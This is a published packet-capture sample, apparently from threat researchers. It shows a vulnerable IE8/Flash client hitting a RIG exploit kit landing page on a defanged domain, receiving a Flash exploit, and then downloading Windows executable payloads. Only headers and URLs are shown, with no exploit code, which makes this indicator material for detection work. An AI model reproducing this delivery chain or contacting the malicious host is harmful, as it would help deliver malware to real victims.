RIG EK Web Exploit Kit Exploiting Vulnerable FLASH x-flash-version: 11,8,800,94 Traffic Sample

June 22, 2015

2015-02-06 12:17:55.655135 IP 192.168.138.158.49166 > 46.182.30.163.80: Flags [P.], seq 1:609, ack 1, win 64240, length 608
GET /?PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu|MzE1MWY4MjZhOTZhYTU4NDAwNDhmZjQ4ZjQwNTI0NDU HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: booster.daily-mood-booster[.]com
Connection: Keep-Alive

2015-02-06 12:17:55.655185 IP 46.182.30.163.80 > 192.168.138.158.49166: Flags [.], ack 609, win 64240, length 0

2015-02-06 12:17:57.261526 IP 46.182.30.163.80 > 192.168.138.158.49166: Flags [P.], seq 1:1356, ack 609, win 64240, length 1355
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Fri, 06 Feb 2015 16:17:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u14
Vary: Accept-Encoding
Content-Encoding: gzip

2015-02-06 12:18:00.209943 IP 192.168.138.158.49166 > 46.182.30.163.80: Flags [P.], seq 609:1031, ack 71884, win 64240, length 422
GET /index.php?req=mp3&num=81&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu%7CMzE1MWY4MjZhOTZhYTU4NDAwNDhmZjQ4ZjQwNTI0NDU HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: booster.daily-mood-booster[.]com
Connection: Keep-Alive

2015-02-06 12:18:00.209988 IP 46.182.30.163.80 > 192.168.138.158.49166: Flags [.], ack 1031, win 64240, length 0

2015-02-06 12:18:02.824202 IP 46.182.30.163.80 > 192.168.138.158.49166: Flags [P.], seq 71884:73239, ack 1031, win 64240, length 1355
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Fri, 06 Feb 2015 16:17:57 GMT
Content-Type: application/x-msdownload
Content-Length: 294912
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u14
Accept-Ranges: bytes

2015-02-06 12:18:06.690502 IP 192.168.138.158.49166 > 46.182.30.163.80: Flags [P.], seq 1031:1654, ack 367019, win 64240, length 623
GET /index.php?req=swf&num=754&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu|MzE1MWY4MjZhOTZhYTU4NDAwNDhmZjQ4ZjQwNTI0NDU HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://booster.daily-mood-booster[.]com/?PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu|MzE1MWY4MjZhOTZhYTU4NDAwNDhmZjQ4ZjQwNTI0NDU
x-flash-version: 11,8,800,94
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: booster.daily-mood-booster[.]com
Connection: Keep-Alive

2015-02-06 12:18:06.690520 IP 46.182.30.163.80 > 192.168.138.158.49166: Flags [.], ack 1654, win 64240, length 0

2015-02-06 12:18:07.239588 IP 46.182.30.163.80 > 192.168.138.158.49166: Flags [P.], seq 367019:368374, ack 1654, win 64240, length 1355
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Fri, 06 Feb 2015 16:18:01 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 20239
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u14

2015-02-06 12:18:08.730450 IP 192.168.138.158.49167 > 46.182.30.163.80: Flags [P.], seq 1:296, ack 1, win 64240, length 295
GET /index.php?req=mp3&num=1607&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu|MzE1MWY4MjZhOTZhYTU4NDAwNDhmZjQ4ZjQwNTI0NDU&dop=1 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: booster.daily-mood-booster[.]com

2015-02-06 12:18:08.730495 IP 46.182.30.163.80 > 192.168.138.158.49167: Flags [.], ack 296, win 64240, length 0

2015-02-06 12:18:09.371527 IP 46.182.30.163.80 > 192.168.138.158.49167: Flags [P.], seq 1:205, ack 296, win 64240, length 204
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Fri, 06 Feb 2015 16:18:04 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u14
Vary: Accept-Encoding

2015-02-06 12:18:09.431866 IP 192.168.138.158.49166 > 46.182.30.163.80: Flags [.], ack 387463, win 64240, length 0

2015-02-06 12:18:09.466280 IP 46.182.30.163.80 > 192.168.138.158.49167: Flags [P.], seq 1:205, ack 296, win 64240, length 204
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Fri, 06 Feb 2015 16:18:04 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u14
Vary: Accept-Encoding

2015-02-06 12:18:09.466473 IP 192.168.138.158.49167 > 46.182.30.163.80: Flags [.], ack 205, win 64036, length 0

2015-02-06 12:18:17.790248 IP 192.168.138.158.49166 > 46.182.30.163.80: Flags [P.], seq 1654:2086, ack 387463, win 64240, length 432
GET /index.php?req=mp3&num=91593&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJkuHbwvnPVsbu%7CMzE1MWY4MjZhOTZhYTU4NDAwNDhmZjQ4ZjQwNTI0NDU&dop=04 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: booster.daily-mood-booster[.]com
Connection: Keep-Alive

2015-02-06 12:18:17.790262 IP 46.182.30.163.80 > 192.168.138.158.49166: Flags [.], ack 2086, win 64240, length 0

2015-02-06 12:18:21.033468 IP 46.182.30.163.80 > 192.168.138.158.49166: Flags [P.], seq 387463:388818, ack 2086, win 64240, length 1355
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Fri, 06 Feb 2015 16:18:16 GMT
Content-Type: application/x-msdownload
Content-Length: 294912
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14+deb7u14
Accept-Ranges: bytes
